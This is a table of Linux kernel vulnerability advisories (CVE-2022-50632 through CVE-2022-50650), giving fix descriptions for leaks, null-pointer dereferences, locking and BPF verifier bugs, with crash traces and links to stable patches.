| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drivers: perf: marvell_cn10k: Fix hotplug callback leak in tad_pmu_init() tad_pmu_init() won't remove the callback added by cpuhp_setup_state_multi() when platform_driver_register() failed. Remove the callback by cpuhp_remove_multi_state() in fail path. Similar to the handling of arm_ccn_init() in commit 26242b330093 ("bus: arm-ccn: Prevent hotplug callback leak") | 2025-12-08 | not yet calculated | CVE-2022-50632 | https://git.kernel.org/stable/c/367404bfd1aa87b2a50059cd8edc6c12c367cd15 https://git.kernel.org/stable/c/7772f4de934123ccd7c7cdc1dc4e46fdd5d767fb https://git.kernel.org/stable/c/973ae93d80d9d262f695eb485a1902b74c4b9098 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: qcom: Fix memory leak in dwc3_qcom_interconnect_init of_icc_get() allocates resources for the path handle; we should release them when they are no longer needed, like the release in the dwc3_qcom_interconnect_exit() function. Add icc_put() in the error handling to fix this. | 2025-12-09 | not yet calculated | CVE-2022-50633 | https://git.kernel.org/stable/c/f9089b95548f0272e02a89989c511e235561d051 https://git.kernel.org/stable/c/56f6de394f0f57928cd401255a5c7866b68a77e3 https://git.kernel.org/stable/c/8c39c8d23ff9fb1beb6e16cf0ae929c764538625 https://git.kernel.org/stable/c/2f3b51189f7a7be5d822fb8c537d778c57eb9821 https://git.kernel.org/stable/c/97a48da1619ba6bd42a0e5da0a03aa490a9496b1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: cw2015: Fix potential null-ptr-deref in cw_bat_probe() cw_bat_probe() calls create_singlethread_workqueue() and does not check the return value, which may be NULL. A null-ptr-deref may then happen: cw_bat_probe() create_singlethread_workqueue() # failed, cw_bat->wq is NULL queue_delayed_work() queue_delayed_work_on() __queue_delayed_work() # warning here, but continue __queue_work() # access wq->flags, null-ptr-deref Check the return value and return -ENOMEM if it is NULL. | 2025-12-09 | not yet calculated | CVE-2022-50634 | https://git.kernel.org/stable/c/f7e2ba8ed08138102f21f3fe6414498c93177fd8 https://git.kernel.org/stable/c/5150b76aa2eb8bb8feb7f7a048417f9d39c3dd04 https://git.kernel.org/stable/c/97f2b4ddb0aa700d673691a7d5e44d226d22bab7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/kprobes: Fix null pointer reference in arch_prepare_kprobe() I found a null pointer reference in arch_prepare_kprobe(): # echo 'p cmdline_proc_show' > kprobe_events # echo 'p cmdline_proc_show+16' >> kprobe_events Kernel attempted to read user page (0) - exploit attempt? (uid: 0) BUG: Kernel NULL pointer dereference on read at 0x00000000 Faulting instruction address: 0xc000000000050bfc Oops: Kernel access of bad area, sig: 11 [#1] LE PAGE_SIZE=64K MMU=Radix SMP NR_CPUS=2048 NUMA PowerNV Modules linked in: CPU: 0 PID: 122 Comm: sh Not tainted 6.0.0-rc3-00007-gdcf8e5633e2e #10 NIP: c000000000050bfc LR: c000000000050bec CTR: 0000000000005bdc REGS: c0000000348475b0 TRAP: 0300 Not tainted (6.0.0-rc3-00007-gdcf8e5633e2e) MSR: 9000000000009033 <SF,HV,EE,ME,IR,DR,RI,LE> CR: 88002444 XER: 20040006 CFAR: c00000000022d100 DAR: 0000000000000000 DSISR: 40000000 IRQMASK: 0 ... NIP arch_prepare_kprobe+0x10c/0x2d0 LR arch_prepare_kprobe+0xfc/0x2d0 Call Trace: 0xc0000000012f77a0 (unreliable) register_kprobe+0x3c0/0x7a0 __register_trace_kprobe+0x140/0x1a0 __trace_kprobe_create+0x794/0x1040 trace_probe_create+0xc4/0xe0 create_or_delete_trace_kprobe+0x2c/0x80 trace_parse_run_command+0xf0/0x210 probes_write+0x20/0x40 vfs_write+0xfc/0x450 ksys_write+0x84/0x140 system_call_exception+0x17c/0x3a0 system_call_vectored_common+0xe8/0x278 --- interrupt: 3000 at 0x7fffa5682de0 NIP: 00007fffa5682de0 LR: 0000000000000000 CTR: 0000000000000000 REGS: c000000034847e80 TRAP: 3000 Not tainted (6.0.0-rc3-00007-gdcf8e5633e2e) MSR: 900000000280f033 <SF,HV,VEC,VSX,EE,PR,FP,ME,IR,DR,RI,LE> CR: 44002408 XER: 00000000 The addresses being probed have something special: cmdline_proc_show: Probe based on ftrace cmdline_proc_show+16: Probe for the next instruction at the ftrace location The ftrace-based kprobe does not generate kprobe::ainsn::insn, it gets set to NULL. In arch_prepare_kprobe() it will check for: ... prev = get_kprobe(p->addr - 1); preempt_enable_no_resched(); if (prev && ppc_inst_prefixed(ppc_inst_read(prev->ainsn.insn))) { ... If prev is based on ftrace, 'ppc_inst_read(prev->ainsn.insn)' will occur with a null pointer reference. At this point prev->addr will not be a prefixed instruction, so the check can be skipped. Check if prev is an ftrace-based kprobe before reading 'prev->ainsn.insn' to fix this problem. [mpe: Trim oops] | 2025-12-09 | not yet calculated | CVE-2022-50635 | https://git.kernel.org/stable/c/7f536a8cb62dd5c084f112373fc34cdb5168a813 https://git.kernel.org/stable/c/4eac4f6a86ae73ef4b772d37398beeba2fbfde4e https://git.kernel.org/stable/c/5fd1b369387c53ee6c774ab86e32e362a1e537ac https://git.kernel.org/stable/c/97f88a3d723162781d6cbfdc7b9617eefab55b19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Fix pci_device_is_present() for VFs by checking PF pci_device_is_present() previously didn't work for VFs because it reads the Vendor and Device ID, which are 0xffff for VFs, which looks like they aren't present. Check the PF instead. Wei Gong reported that if virtio I/O is in progress when the driver is unbound or "0" is written to /sys/.../sriov_numvfs, the virtio I/O operation hangs, which may result in output like this: task:bash state:D stack: 0 pid: 1773 ppid: 1241 flags:0x00004002 Call Trace: schedule+0x4f/0xc0 blk_mq_freeze_queue_wait+0x69/0xa0 blk_mq_freeze_queue+0x1b/0x20 blk_cleanup_queue+0x3d/0xd0 virtblk_remove+0x3c/0xb0 [virtio_blk] virtio_dev_remove+0x4b/0x80 ... device_unregister+0x1b/0x60 unregister_virtio_device+0x18/0x30 virtio_pci_remove+0x41/0x80 pci_device_remove+0x3e/0xb0 This happened because pci_device_is_present(VF) returned "false" in virtio_pci_remove(), so it called virtio_break_device(). The broken vq meant that vring_interrupt() skipped the vq.callback() that would have completed the virtio I/O operation via virtblk_done(). [bhelgaas: commit log, simplify to always use pci_physfn(), add stable tag] | 2025-12-09 | not yet calculated | CVE-2022-50636 | https://git.kernel.org/stable/c/f4b44c7766dae2b8681f621941cabe9f14066d59 https://git.kernel.org/stable/c/643d77fda08d06f863af35e80a7e517ea61d9629 https://git.kernel.org/stable/c/65bd0962992abd42e77a05e68c7b40e7c73726d1 https://git.kernel.org/stable/c/99ef6cc791584495987dd11b14769b450dfa5820 https://git.kernel.org/stable/c/67fd41bbb0f51aa648a47f728b99e6f1fa2ccc34 https://git.kernel.org/stable/c/81565e51ccaf6fff8910e997ee22e16b5e1dabc3 https://git.kernel.org/stable/c/518573988a2f14f517403db2ece5ddaefba21e94 https://git.kernel.org/stable/c/98b04dd0b4577894520493d96bc4623387767445 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: qcom-hw: Fix memory leak in qcom_cpufreq_hw_read_lut() If "cpu_dev" fails to get the opp table in qcom_cpufreq_hw_read_lut(), the program will return, resulting in the "table" resource not being released. | 2025-12-09 | not yet calculated | CVE-2022-50637 | https://git.kernel.org/stable/c/3ef12a4a8ef5553af9c3fd2719a616637a102568 https://git.kernel.org/stable/c/4ea765b10624d67407817100d381c60f53593033 https://git.kernel.org/stable/c/5d430076e66bddd08612911513b36f932b0d9d6c https://git.kernel.org/stable/c/242e23be8f31ebd90525c57ee3244c28e99a1697 https://git.kernel.org/stable/c/9901c21bcaf2f01fe5078f750d624f4ddfa8f81b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix bug_on in __es_tree_search caused by bad boot loader inode We got an issue as follows: ================================================================== kernel BUG at fs/ext4/extents_status.c:203! invalid opcode: 0000 [#1] PREEMPT SMP CPU: 1 PID: 945 Comm: cat Not tainted 6.0.0-next-20221007-dirty #349 RIP: 0010:ext4_es_end.isra.0+0x34/0x42 RSP: 0018:ffffc9000143b768 EFLAGS: 00010203 RAX: 0000000000000000 RBX: ffff8881769cd0b8 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff8fc27cf7 RDI: 00000000ffffffff RBP: ffff8881769cd0bc R08: 0000000000000000 R09: ffffc9000143b5f8 R10: 0000000000000001 R11: 0000000000000001 R12: ffff8881769cd0a0 R13: ffff8881768e5668 R14: 00000000768e52f0 R15: 0000000000000000 FS: 00007f359f7f05c0(0000)GS:ffff88842fd00000(0000)knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f359f5a2000 CR3: 000000017130c000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> __es_tree_search.isra.0+0x6d/0xf5 ext4_es_cache_extent+0xfa/0x230 ext4_cache_extents+0xd2/0x110 ext4_find_extent+0x5d5/0x8c0 ext4_ext_map_blocks+0x9c/0x1d30 ext4_map_blocks+0x431/0xa50 ext4_mpage_readpages+0x48e/0xe40 ext4_readahead+0x47/0x50 read_pages+0x82/0x530 page_cache_ra_unbounded+0x199/0x2a0 do_page_cache_ra+0x47/0x70 page_cache_ra_order+0x242/0x400 ondemand_readahead+0x1e8/0x4b0 page_cache_sync_ra+0xf4/0x110 filemap_get_pages+0x131/0xb20 filemap_read+0xda/0x4b0 generic_file_read_iter+0x13a/0x250 ext4_file_read_iter+0x59/0x1d0 vfs_read+0x28f/0x460 ksys_read+0x73/0x160 __x64_sys_read+0x1e/0x30 do_syscall_64+0x35/0x80 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> ================================================================== In the above issue, ioctl invokes the swap_inode_boot_loader function to swap inode<5> and inode<12>. However, inode<5> contains an incorrect imode and disordered extents, and i_nlink is set to 1. The extents check for the inode in the ext4_iget function can be bypassed because 5 is EXT4_BOOT_LOADER_INO. While links_count is set to 1, the extents are not initialized in swap_inode_boot_loader. After the ioctl command is executed successfully, the extents are swapped to inode<12>; in this case, running the `cat` command to view inode<12> triggers the BUG_ON due to the incorrect extents. When the boot loader inode is not initialized, its imode can be one of the following: 1) the imode is a bad type, which is marked as bad_inode in ext4_iget and set to S_IFREG. 2) the imode is a good type but not S_IFREG. 3) the imode is S_IFREG. The BUG_ON may be triggered by bypassing the check in cases 1 and 2. Therefore, when the boot loader inode is bad_inode or its imode is not S_IFREG, initialize the inode to avoid triggering the BUG. | 2025-12-09 | not yet calculated | CVE-2022-50638 | https://git.kernel.org/stable/c/e76ede9d2c9e0af4573342b56d7cdbf757c18084 https://git.kernel.org/stable/c/a95ba369255ddcdc5e43d38bc5203537bdf3a518 https://git.kernel.org/stable/c/5f8d36abd2059bf1bd016b17d1fe78d8613deddd https://git.kernel.org/stable/c/78e335fb573e6a85718c4c24d5a052718a99a9ed https://git.kernel.org/stable/c/71e99ec1315fe98d322b17b9a28f204aaf15ffee https://git.kernel.org/stable/c/d480a49c15c465cb9a16db1379f4996e9b5bb9cc https://git.kernel.org/stable/c/feec0ea94c5ef4aa118750284c8a921698733ef2 https://git.kernel.org/stable/c/a125c8806b7d3c3815b6f9f59d395b9d7527b0ef https://git.kernel.org/stable/c/991ed014de0840c5dc405b679168924afb2952ac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io-wq: Fix memory leak in worker creation If the CPU mask allocation for a node fails, then the memory allocated for the 'io_wqe' struct of the current node doesn't get freed on the error handling path, since it has not yet been added to the 'wqes' array. This was spotted when fuzzing v6.1-rc1 with Syzkaller: BUG: memory leak unreferenced object 0xffff8880093d5000 (size 1024): comm "syz-executor.2", pid 7701, jiffies 4295048595 (age 13.900s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<00000000cb463369>] __kmem_cache_alloc_node+0x18e/0x720 [<00000000147a3f9c>] kmalloc_node_trace+0x2a/0x130 [<000000004e107011>] io_wq_create+0x7b9/0xdc0 [<00000000c38b2018>] io_uring_alloc_task_context+0x31e/0x59d [<00000000867399da>] __io_uring_add_tctx_node.cold+0x19/0x1ba [<000000007e0e7a79>] io_uring_setup.cold+0x1b80/0x1dce [<00000000b545e9f6>] __x64_sys_io_uring_setup+0x5d/0x80 [<000000008a8a7508>] do_syscall_64+0x5d/0x90 [<000000004ac08bec>] entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-09 | not yet calculated | CVE-2022-50639 | https://git.kernel.org/stable/c/b6e2c54be37d5eb4f6666e6aa59cd0581c7ffc3c https://git.kernel.org/stable/c/ed981911a7c90a604f4a2bee908ab07e3b786aca https://git.kernel.org/stable/c/996d3efeb091c503afd3ee6b5e20eabf446fd955 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: core: Fix kernel panic when remove non-standard SDIO card The SDIO tuple is only allocated for a standard SDIO card; in particular, this causes memory corruption issues when a non-standard SDIO card has been removed, because the card device's reference counter is not increased for it at sdio_init_func(), but every SDIO card device reference counter gets decreased at sdio_release_func(). | 2025-12-09 | not yet calculated | CVE-2022-50640 | https://git.kernel.org/stable/c/b8b2965932e702b21e335ff30e1bb550f5a23b6f https://git.kernel.org/stable/c/b3275dde570b6420106a715bb58a0af041b94d95 https://git.kernel.org/stable/c/1fb79478695d92bab1c120ad3dad05252b02a29d https://git.kernel.org/stable/c/7a09c64b7da0abdec3919812e3d93ecc44069ed0 https://git.kernel.org/stable/c/8bf037279b5869ae9331c42bb1527d2680ebba96 https://git.kernel.org/stable/c/1e8cd93ae536581562bab4e1d8c5315bbc2548bf https://git.kernel.org/stable/c/66d461a92f32b6995b630625d350259b6b1f961b https://git.kernel.org/stable/c/9972e6b404884adae9eec7463e30d9b3c9a70b18 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HSI: omap_ssi: Fix refcount leak in ssi_probe When returning or breaking early from a for_each_available_child_of_node() loop, we need to explicitly call of_node_put() on the child node to possibly release the node. | 2025-12-09 | not yet calculated | CVE-2022-50641 | https://git.kernel.org/stable/c/20fbaff6699ea5553c67550e867d6f90b7085447 https://git.kernel.org/stable/c/18e199a5541aad6dc5cf51bc3f712247b2d17894 https://git.kernel.org/stable/c/e8a218c17d7c5c42d5609ef92d339b47f3d11d02 https://git.kernel.org/stable/c/aa9c0598b10960ad1198044da1e277a89b4e3af6 https://git.kernel.org/stable/c/962f22e7f7698f7718d95bd9b63e41fb8cca01a9 https://git.kernel.org/stable/c/691f23a8475f04c988f7e98066b084e996b40fa0 https://git.kernel.org/stable/c/e25f56f8bdf66126a54b5a88bc021c82bfb50b75 https://git.kernel.org/stable/c/0eff9ef67d91e350d2047c3e13b6c3b7d0c90bf4 https://git.kernel.org/stable/c/9a2ea132df860177b33c9fd421b26c4e9a0a9396 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/chrome: cros_ec_typec: zero out stale pointers `cros_typec_get_switch_handles` allocates four pointers when obtaining type-c switch handles. These pointers are all freed if obtaining any of them fails; therefore, the pointers in `port` become stale. The stale pointers eventually cause a use-after-free or double free in later code paths. Zero out all pointer fields after freeing to eliminate these stale pointers. | 2025-12-09 | not yet calculated | CVE-2022-50642 | https://git.kernel.org/stable/c/0ceadb5a3e45f1b81cf54bd496b40a5e50b6bd40 https://git.kernel.org/stable/c/b610758bb3e0674644c1255cdafc2f46b7e05ff9 https://git.kernel.org/stable/c/6613f36a2fa5c69e528bccba8b3d831f759dad2f https://git.kernel.org/stable/c/9a8aadcf0b459c1257b9477fd6402e1d5952ae07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix xid leak in cifs_copy_file_range() If the file is used by swap, the xid should be freed before returning -EOPNOTSUPP; otherwise, the xid will be leaked. | 2025-12-09 | not yet calculated | CVE-2022-50643 | https://git.kernel.org/stable/c/bf49d4fe4ab7b8d812927a2c7b514864d5fc1bb2 https://git.kernel.org/stable/c/27cfd3afaab000a455194338db3b7f2031fde9d0 https://git.kernel.org/stable/c/dc283313d1ca378d787cb55c1e580dc3de852680 https://git.kernel.org/stable/c/9a97df404a402fe1174d2d1119f87ff2a0ca2fe9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: ti: dra7-atl: Fix reference leak in of_dra7_atl_clk_probe pm_runtime_get_sync() will increment the pm usage counter. Forgetting the put operation will result in a reference leak. Add the missing pm_runtime_put_sync in some error paths. | 2025-12-09 | not yet calculated | CVE-2022-50644 | https://git.kernel.org/stable/c/27abe45df1dc394c184688d816cbbf2f194d4c6a https://git.kernel.org/stable/c/d84f77ef7d57658d7346f8c4797a570aa5e35fa6 https://git.kernel.org/stable/c/25fe7b0d596b343e7a5504ba11767115fff8494f https://git.kernel.org/stable/c/fc39ebf85d0349366b807fe2be848041c8523f03 https://git.kernel.org/stable/c/6d01017247eee3fba399f601b0bcb38e4fb88a72 https://git.kernel.org/stable/c/3441076f83aace85f5d6ccd9ffb301ac6b874776 https://git.kernel.org/stable/c/a9f69663ad571cbd7814dde38e3fcb4876341ed6 https://git.kernel.org/stable/c/c01ae99a4e3a0cdf70f7cd758a60a2243eac562c https://git.kernel.org/stable/c/9c59a01caba26ec06fefd6ca1f22d5fd1de57d63 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: EDAC/i10nm: fix refcount leak in pci_get_dev_wrapper() As the comment of pci_get_domain_bus_and_slot() says, it returns a PCI device with refcount incremented, so it doesn't need to call an extra pci_dev_get() in pci_get_dev_wrapper(), and the PCI device needs to be put in the error path. | 2025-12-09 | not yet calculated | CVE-2022-50645 | https://git.kernel.org/stable/c/e6e295a434d1c917a017980389aec88bf35cc81b https://git.kernel.org/stable/c/2db53c7059167b63cc790366ef1a9e286e71980b https://git.kernel.org/stable/c/3e255dc21031cc1f341584eb99a7f31598bf0be7 https://git.kernel.org/stable/c/1adb2583cdbd75f379e3230a43a7412d373d499f https://git.kernel.org/stable/c/f29c2f57cdf7a57223dcd9fbaa2261faab5234b2 https://git.kernel.org/stable/c/9c8921555907f4d723f01ed2d859b66f2d14f08e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: hpsa: Fix possible memory leak in hpsa_init_one() The hpda_alloc_ctlr_info() allocates h and its field reply_map. However, in hpsa_init_one(), if alloc_percpu() fails, hpsa_init_one() jumps to clean1 directly, which frees h and leaks h->reply_map. Fix by calling hpda_free_ctlr_info() to release h->reply_map and h instead of freeing h directly. | 2025-12-09 | not yet calculated | CVE-2022-50646 | https://git.kernel.org/stable/c/f4d1c14e8b404766ff2bb8644bb19443d73965de https://git.kernel.org/stable/c/f8fc2f18652917cdcc89cb23f3a1b7cb6e119c5e https://git.kernel.org/stable/c/c808edbf580bfc454671cbe66e9d7c2e938e7601 https://git.kernel.org/stable/c/bfe10a1d9fbccdf39f8449d62509f070d8aaaac1 https://git.kernel.org/stable/c/fc998d0a7d65672f0812f11cd0ec4bbe4f8f8507 https://git.kernel.org/stable/c/0aa7be66168b1e84b2581ffff3ccb54a6c804a1e https://git.kernel.org/stable/c/9c9ff300e0de07475796495d86f449340d454a0c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RISC-V: Make port I/O string accessors actually work Fix port I/O string accessors such as `insb', `outsb', etc. which use the physical PCI port I/O address rather than the corresponding memory mapping to get at the requested location, which in turn breaks at least accesses made by our parport driver to a PCIe parallel port such as: PCI parallel port detected: 1415:c118, I/O at 0x1000(0x1008), IRQ 20 parport0: PC-style at 0x1000 (0x1008), irq 20, using FIFO [PCSPP,TRISTATE,COMPAT,EPP,ECP] causing a memory access fault: Unable to handle kernel access to user memory without uaccess routines at virtual address 0000000000001008 Oops [#1] Modules linked in: CPU: 1 PID: 350 Comm: cat Not tainted 6.0.0-rc2-00283-g10d4879f9ef0-dirty #23 Hardware name: SiFive HiFive Unmatched A00 (DT) epc : parport_pc_fifo_write_block_pio+0x266/0x416 ra : parport_pc_fifo_write_block_pio+0xb4/0x416 epc : ffffffff80542c3e ra : ffffffff80542a8c sp : ffffffd88899fc60 gp : ffffffff80fa2700 tp : ffffffd882b1e900 t0 : ffffffd883d0b000 t1 : ffffffffff000002 t2 : 4646393043330a38 s0 : ffffffd88899fcf0 s1 : 0000000000001000 a0 : 0000000000000010 a1 : 0000000000000000 a2 : ffffffd883d0a010 a3 : 0000000000000023 a4 : 00000000ffff8fbb a5 : ffffffd883d0a001 a6 : 0000000100000000 a7 : ffffffc800000000 s2 : ffffffffff000002 s3 : ffffffff80d28880 s4 : ffffffff80fa1f50 s5 : 0000000000001008 s6 : 0000000000000008 s7 : ffffffd883d0a000 s8 : 0004000000000000 s9 : ffffffff80dc1d80 s10: ffffffd8807e4000 s11: 0000000000000000 t3 : 00000000000000ff t4 : 393044410a303930 t5 : 0000000000001000 t6 : 0000000000040000 status: 0000000200000120 badaddr: 0000000000001008 cause: 000000000000000f [<ffffffff80543212>] parport_pc_compat_write_block_pio+0xfe/0x200 [<ffffffff8053bbc0>] parport_write+0x46/0xf8 [<ffffffff8050530e>] lp_write+0x158/0x2d2 [<ffffffff80185716>] vfs_write+0x8e/0x2c2 [<ffffffff80185a74>] ksys_write+0x52/0xc2 [<ffffffff80185af2>] sys_write+0xe/0x16 [<ffffffff80003770>] ret_from_syscall+0x0/0x2 ---[ end trace 0000000000000000 ]--- For simplicity address the problem by adding PCI_IOBASE to the physical address requested in the respective wrapper macros only, observing that the raw accessors such as `__insb', `__outsb', etc. are not supposed to be used other than by said macros. Remove the cast to `long' that is no longer needed on `addr' now that it is used as an offset from PCI_IOBASE and add parentheses around `addr' needed for predictable evaluation in macro expansion. No need to make said adjustments in separate changes given that current code is gravely broken and does not ever work. | 2025-12-09 | not yet calculated | CVE-2022-50647 | https://git.kernel.org/stable/c/2c60db6869fe5213471fcf4fe5704dc29da8b5ee https://git.kernel.org/stable/c/2ce9fab94b8db61f014e43ddf80dd1524ae6dff4 https://git.kernel.org/stable/c/dc235db7b79a352d07d62e8757ad856dbf1564c1 https://git.kernel.org/stable/c/140b2b92dbefffa7f4f7211a1fd399a6e79e71c4 https://git.kernel.org/stable/c/1acee4616930fc07265cb8e539753a8062daa8e0 https://git.kernel.org/stable/c/9cc205e3c17d5716da7ebb7fa0c985555e95d009 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix recursive locking direct_mutex in ftrace_modify_direct_caller Naveen reported recursive locking of direct_mutex with sample ftrace-direct-modify.ko: [ 74.762406] WARNING: possible recursive locking detected [ 74.762887] 6.0.0-rc6+ #33 Not tainted [ 74.763216] -------------------------------------------- [ 74.763672] event-sample-fn/1084 is trying to acquire lock: [ 74.764152] ffffffff86c9d6b0 (direct_mutex){+.+.}-{3:3}, at: \ register_ftrace_function+0x1f/0x180 [ 74.764922] [ 74.764922] but task is already holding lock: [ 74.765421] ffffffff86c9d6b0 (direct_mutex){+.+.}-{3:3}, at: \ modify_ftrace_direct+0x34/0x1f0 [ 74.766142] [ 74.766142] other info that might help us debug this: [ 74.766701] Possible unsafe locking scenario: [ 74.766701] [ 74.767216] CPU0 [ 74.767437] ---- [ 74.767656] lock(direct_mutex); [ 74.767952] lock(direct_mutex); [ 74.768245] [ 74.768245] *** DEADLOCK *** [ 74.768245] [ 74.768750] May be due to missing lock nesting notation [ 74.768750] [ 74.769332] 1 lock held by event-sample-fn/1084: [ 74.769731] #0: ffffffff86c9d6b0 (direct_mutex){+.+.}-{3:3}, at: \ modify_ftrace_direct+0x34/0x1f0 [ 74.770496] [ 74.770496] stack backtrace: [ 74.770884] CPU: 4 PID: 1084 Comm: event-sample-fn Not tainted ... [ 74.771498] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), ... [ 74.772474] Call Trace: [ 74.772696] <TASK> [ 74.772896] dump_stack_lvl+0x44/0x5b [ 74.773223] __lock_acquire.cold.74+0xac/0x2b7 [ 74.773616] lock_acquire+0xd2/0x310 [ 74.773936] ? register_ftrace_function+0x1f/0x180 [ 74.774357] ? lock_is_held_type+0xd8/0x130 [ 74.774744] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.775213] __mutex_lock+0x99/0x1010 [ 74.775536] ? register_ftrace_function+0x1f/0x180 [ 74.775954] ? slab_free_freelist_hook.isra.43+0x115/0x160 [ 74.776424] ? ftrace_set_hash+0x195/0x220 [ 74.776779] ? register_ftrace_function+0x1f/0x180 [ 74.777194] ? kfree+0x3e1/0x440 [ 74.777482] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.777941] ? __schedule+0xb40/0xb40 [ 74.778258] ? register_ftrace_function+0x1f/0x180 [ 74.778672] ? my_tramp1+0xf/0xf [ftrace_direct_modify] [ 74.779128] register_ftrace_function+0x1f/0x180 [ 74.779527] ? ftrace_set_filter_ip+0x33/0x70 [ 74.779910] ? __schedule+0xb40/0xb40 [ 74.780231] ? my_tramp1+0xf/0xf [ftrace_direct_modify] [ 74.780678] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.781147] ftrace_modify_direct_caller+0x5b/0x90 [ 74.781563] ? 0xffffffffa0201000 [ 74.781859] ? my_tramp1+0xf/0xf [ftrace_direct_modify] [ 74.782309] modify_ftrace_direct+0x1b2/0x1f0 [ 74.782690] ? __schedule+0xb40/0xb40 [ 74.783014] ? simple_thread+0x2a/0xb0 [ftrace_direct_modify] [ 74.783508] ? __schedule+0xb40/0xb40 [ 74.783832] ? my_tramp2+0x11/0x11 [ftrace_direct_modify] [ 74.784294] simple_thread+0x76/0xb0 [ftrace_direct_modify] [ 74.784766] kthread+0xf5/0x120 [ 74.785052] ? kthread_complete_and_exit+0x20/0x20 [ 74.785464] ret_from_fork+0x22/0x30 [ 74.785781] </TASK> Fix this by using register_ftrace_function_nolock in ftrace_modify_direct_caller. | 2025-12-09 | not yet calculated | CVE-2022-50648 | https://git.kernel.org/stable/c/2482eacb685b6500e158268befbe6c90de5f166a https://git.kernel.org/stable/c/9d2ce78ddcee159eb6a97449e9c68b6d60b9cec4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: adp5061: fix out-of-bounds read in adp5061_get_chg_type() ADP5061_CHG_STATUS_1_CHG_STATUS is masked with 0x07, which means a length of 8, but the adp5061_chg_type array size is 4, so it may end up reading 4 elements beyond the end of the adp5061_chg_type[] array. | 2025-12-09 | not yet calculated | CVE-2022-50649 | https://git.kernel.org/stable/c/24a0be36e9a21f63de2e6088607e689e59ec15f4 https://git.kernel.org/stable/c/3376a0cf138dfc90b449fde541ca228a33e1c143 https://git.kernel.org/stable/c/89f305a71418591cdda18180f712f91c9820f03b https://git.kernel.org/stable/c/7c8bc374659de19d846f7cab3eda9ebdb005c4cc https://git.kernel.org/stable/c/038e4aa71281d0cbc8aeb56ba05ff7fc5653a106 https://git.kernel.org/stable/c/dc52b73d3acd676ccbb440fcec617c547b903af2 https://git.kernel.org/stable/c/9d47e01b9d807808224347935562f7043a358054 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix reference state management for synchronous callbacks Currently, the verifier verifies callback functions (sync and async) as if they will be executed once, (i.e. it explores execution state as if the function was being called once). The next insn to explore is set to the start of the subprog and the exit from the nested frame is handled using curframe > 0 and prepare_func_exit. In case of an async callback it uses a customized variant of push_stack simulating a kind of branch to set up custom state and execution context for the async callback. While this approach is simple and works when the callback really will be executed only once, it is unsafe for all of our current helpers which are for_each style, i.e. they execute the callback multiple times. A callback releasing acquired references of the caller may do so multiple times, but currently the verifier sees it as one call inside the frame, which then returns to the caller. Hence, it thinks it released some reference that the cb e.g. got access to through callback_ctx (register filled inside cb from spilled typed register on stack). Similarly, it may see that an acquire call is unpaired inside the callback, so the caller will copy the reference state of the callback and then will have to release the register with new ref_obj_ids. But again, the callback may execute multiple times, while the verifier will only account for acquired references for a single symbolic execution of the callback, which will cause leaks. Note that for the async callback case, things are different. While currently we have bpf_timer_set_callback which only executes it once, even for multiple executions it would be safe, as reference state is NULL and check_reference_leak would force the program to release state before BPF_EXIT. The state is also unaffected by analysis for the caller frame. Hence the async callback is safe. Since we want the reference state to be accessible, e.g. for pointers loaded from stack through callback_ctx's PTR_TO_STACK, we still have to copy the caller's reference_state to the callback's bpf_func_state, but we enforce that whatever references it adds to that reference_state have been released before it hits BPF_EXIT. This requires introducing a new callback_ref member in the reference state to distinguish between caller vs callee references. Hence, check_reference_leak now errors out if it sees we are in callback_fn and we have not released callback_ref refs. Since there can be multiple nested callbacks, like frame 0 -> cb1 -> cb2 etc., we need to also distinguish between whether this particular ref belongs to this callback frame or the parent, and only error for our own, so we store state->frameno (which is always non-zero for callbacks). In short, callbacks can read the parent reference_state, but cannot mutate it, to be able to use pointers acquired by the caller. They must only undo their changes (by releasing their own acquired_refs before BPF_EXIT) on top of the caller reference_state before returning (at which point the caller and callback state will match anyway, so no need to copy it back to the caller). | 2025-12-09 | not yet calculated | CVE-2022-50650 | https://git.kernel.org/stable/c/4ed5155043c97ac8912bcf67331df87c833fb067 https://git.kernel.org/stable/c/caa176c0953cdfd5ce500fb517ce1ea924a8bc4c https://git.kernel.org/stable/c/aed931fd3b6e28f19cc140ff90aa5046ee2aa4e1 https://git.kernel.org/stable/c/9d9d00ac29d0ef7ce426964de46fa6b380357d0a |
